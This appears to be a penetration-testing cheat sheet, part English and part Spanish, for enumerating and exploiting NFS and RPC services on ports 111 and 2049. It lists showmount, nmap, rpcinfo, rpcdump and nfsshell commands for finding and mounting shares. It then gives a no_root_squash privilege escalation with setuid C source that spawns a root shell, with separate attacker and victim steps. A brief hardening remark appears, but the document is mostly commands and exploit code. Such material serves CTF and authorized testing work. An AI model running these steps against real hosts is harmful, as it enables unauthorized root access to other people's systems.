Ports 111 and 2049 (RPC/NFS)
Network file sharing (NFS)
Show Mountable NFS Shares
showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>
Mount a share
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
NFS misconfigurations
# List exported shares
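cat /etc/exports
If you find a directory that is exported with no_root_squash/no_all_squash, you may be able to escalate privileges. no_root_squash is the option that lets root on a client act as root on the export; the default is root_squash. Hardening: keep root_squash on every export, and mount the exported filesystem and its client mounts with nosuid so that setuid bits on the share are ignored.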
# Attacker, as root user
mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn
# Victim
cd <SHARE>
./pwn # Root shell
scan
showmount -e someexample.com
rpcinfo 111
installation
apt-get install rpcbind
apt-get install nfs-common
rpcinfo -p IP_Address
rpcdump
by impacket
rpcdump.py 10.10.xx.xx
nmap
nmap -Pn -sV -script=nfs*
mount the nfs
mount -o nolock <ip>:/path_remote /path/local
$ mkdir backup
$ mount -o ro,noexec someexample.com:/backup backup
$ ls backup
backup.tar.bz2.zip
$ mount -t nfs someexample.com:/backup backup
vulnerabilidad
chequear "/etc/exports": si tiene no_root_squash o no_all_squash y tenemos permisos de escritura, se puede crear un ejecutable con setuid, ej.:
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
chown root.root ./pwnme
chmod u+s ./pwnme
nfsshell
install https://github.com/NetDirect/nfsshell
root@kali:~/Downloads/nfsshell-master# apt-get install libreadline-dev libncurses5-dev
root@kali:~/Downloads/nfsshell-master# make
use
root@kali:~# nfsshell
nfs> host 10.10.10.34
nfs> export
nfs> mount /loquefuere